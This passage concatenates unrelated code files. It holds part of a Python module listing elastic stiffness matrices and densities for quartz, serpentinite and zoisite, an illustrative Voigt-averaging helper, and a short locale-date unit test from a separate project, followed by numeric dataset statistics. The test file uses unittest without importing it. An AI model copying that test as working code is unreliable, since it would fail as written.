C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 33.39
return C, rho
def quartz():
"""
Elastic constants of quartz mineral (GPa) from
Lakshtanov et al. (2007), in Voigt notation
- Abbreviation: ``'qtz'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2649 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.quartz()[0]
array([[ 86.9, 7.6, 12. , 17.8, 0. , 0. ],
[ 7.6, 86.9, 12. , -17.8, 0. , 0. ],
[ 12. , 12. , 106.4, 0. , 0. , 0. ],
[ 17.8, -17.8, 0. , 59.5, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 59.5, -17.8],
[ 0. , 0. , 0. , 0. , -17.8, 39.6]])
>>> elast.quartz()[1]
2649.0
"""
rho = 2649.
C = np.zeros((6,6), dtype=float)
C[0,0] = 86.9; C[0,1] = 7.6; C[0,2] = 12.; C[0,3] = 17.8; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 86.9; C[1,2] = 12.; C[1,3] = -17.8; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 106.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 59.5; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 59.5; C[4,5] = -17.8
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 39.6
return C, rho
def serpentinite_37():
"""
Elastic constants of serpentinite rock sample HPS-M (GPa) from
Watanabe et al., 2011, in Voigt notation.
- Mineralogy: ``Ol`` (57.7%), ``Atg`` (36.9%), ``Trm`` (4.5%), ``Mgt`` (1.1%)
- Abbreviation: ``'SP_37'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3000 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.serpentinite_37()[0]
array([[ 2.0552e+02, 6.6360e+01, 6.2290e+01, -1.0000e-01, -1.4800e+00,
3.8600e+00],
[ 6.6360e+01, 1.9579e+02, 6.2530e+01, -3.7000e-01, 2.0000e-01,
1.5400e+00],
[ 6.2290e+01, 6.2530e+01, 1.9330e+02, -1.7800e+00, -2.4000e-01,
8.3000e-01],
[-1.0000e-01, -3.7000e-01, -1.7800e+00, 6.6170e+01, 1.4700e+00,
-5.7000e-01],
[-1.4800e+00, 2.0000e-01, -2.4000e-01, 1.4700e+00, 6.4700e+01,
-8.4000e-01],
[ 3.8600e+00, 1.5400e+00, 8.3000e-01, -5.7000e-01, -8.4000e-01,
6.7830e+01]])
>>> elast.serpentinite_37()[1]
3000.0
"""
rho = 3000.
C = np.zeros((6,6), dtype=float)
C[0,0] = 205.52; C[0,1] = 66.36; C[0,2] = 62.29; C[0,3] = -0.1; C[0,4] = -1.48; C[0,5] = 3.86
C[1,0] = C[0,1]; C[1,1] = 195.79; C[1,2] = 62.53; C[1,3] = -0.37; C[1,4] = 0.2; C[1,5] = 1.54
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 193.30; C[2,3] = -1.78; C[2,4] = -0.24; C[2,5] = 0.83
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 66.17; C[3,4] = 1.47; C[3,5] = -0.57
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 64.70; C[4,5] = -0.84
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 67.83
return C, rho
def serpentinite_80():
"""
Elastic constants of serpentinite rock sample HKB-B (GPa) from
Watanabe et al., 2011, in Voigt notation
- Mineralogy: ``Ol`` (12.0%), ``Atg`` (80.2%), ``Mgt`` (7.8%)
- Abbreviation: ``'SP_80'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2800 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.serpentinite_80()[0]
array([[ 1.9225e+02, 4.9350e+01, 4.1700e+01, -4.5500e+00, 8.0400e+00,
9.7800e+00],
[ 4.9350e+01, 1.5690e+02, 4.2360e+01, -6.9100e+00, 7.1000e-01,
1.8400e+00],
[ 4.1700e+01, 4.2360e+01, 1.4162e+02, -4.2800e+00, 1.1100e+00,
1.9000e-01],
[-4.5500e+00, -6.9100e+00, -4.2800e+00, 5.3480e+01, 1.0000e-02,
-6.0000e-02],
[ 8.0400e+00, 7.1000e-01, 1.1100e+00, 1.0000e-02, 5.1910e+01,
-3.7200e+00],
[ 9.7800e+00, 1.8400e+00, 1.9000e-01, -6.0000e-02, -3.7200e+00,
5.9130e+01]])
>>> elast.serpentinite_80()[1]
2800.0
"""
rho = 2800.
C = np.zeros((6,6), dtype=float)
C[0,0] = 192.25; C[0,1] = 49.35; C[0,2] = 41.7; C[0,3] = -4.55; C[0,4] = 8.04; C[0,5] = 9.78
C[1,0] = C[0,1]; C[1,1] = 156.9; C[1,2] = 42.36; C[1,3] = -6.91; C[1,4] = 0.71; C[1,5] = 1.84
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 141.62; C[2,3] = -4.28; C[2,4] = 1.11; C[2,5] = 0.19
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 53.48; C[3,4] = 0.01; C[3,5] = -0.06
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 51.91; C[4,5] = -3.72
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 59.13
return C, rho
def zoisite():
"""
Elastic constants of zoisite mineral (GPa) from
Mao et al. (2007), in Voigt notation
- Abbreviation: ``'zo'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3343 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.zoisite()[0]
array([[279.8, 94.7, 88.7, 0. , 0. , 0. ],
[ 94.7, 249.2, 27.5, 0. , 0. , 0. ],
[ 88.7, 27.5, 209.4, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 51.8, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 81.4, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 66.3]])
>>> elast.zoisite()[1]
3343.0
"""
rho = 3343.
C = np.zeros((6,6), dtype=float)
C[0,0] = 279.8; C[0,1] = 94.7; C[0,2] = 88.7; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 249.2; C[1,2] = 27.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 209.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 51.8; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 81.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 66.3
return C, rho
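A common use of these stiffness matrices is to reduce them to isotropic averages. The sketch below (illustrative only, not part of telewavesim) computes the Voigt-average bulk and shear moduli from a 6x6 matrix in GPa and the corresponding isotropic body-wave velocities:

```python
import numpy as np

def voigt_average_moduli(C, rho):
    """Illustrative helper: Voigt-average isotropic moduli and
    velocities from a 6x6 stiffness matrix C (GPa) and density
    rho (kg/m^3). Returns (K, G, Vp, Vs): moduli in GPa,
    velocities in km/s."""
    # Voigt-average bulk modulus from the upper-left 3x3 block
    K = (C[0, 0] + C[1, 1] + C[2, 2]
         + 2.0 * (C[0, 1] + C[0, 2] + C[1, 2])) / 9.0
    # Voigt-average shear modulus
    G = ((C[0, 0] + C[1, 1] + C[2, 2])
         - (C[0, 1] + C[0, 2] + C[1, 2])
         + 3.0 * (C[3, 3] + C[4, 4] + C[5, 5])) / 15.0
    # GPa -> Pa (factor 1e9), velocities reported in km/s
    Vp = np.sqrt((K + 4.0 * G / 3.0) * 1.0e9 / rho) / 1.0e3
    Vs = np.sqrt(G * 1.0e9 / rho) / 1.0e3
    return K, G, Vp, Vs
```

For an already-isotropic mineral such as garnet above, this recovers a single pair of body-wave speeds; for anisotropic minerals it gives only the orientation-averaged values.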
# File: whoahqa/tests/utils/test_format_locale_date.py
# Repository: onaio/who-adolescent-hqa (Apache-2.0)
from datetime import date
from pyramid import testing
from whoahqa.utils import format_date_for_locale
class TestLocaleDate(unittest.TestCase):
def test_returns_date_string_as_per_request_locale(self):
request = testing.DummyRequest()
formatted_date = format_date_for_locale(
date(2014, 3, 13), "MMM Y", request)
self.assertEqual(formatted_date, "Mar 2014")
| 27.866667 | 61 | 0.746411 | 54 | 418 | 5.5 | 0.592593 | 0.06734 | 0.087542 | 0.127946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.184211 | 418 | 14 | 62 | 29.857143 | 0.83871 | 0 | 0 | 0 | 0 | 0 | 0.0311 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |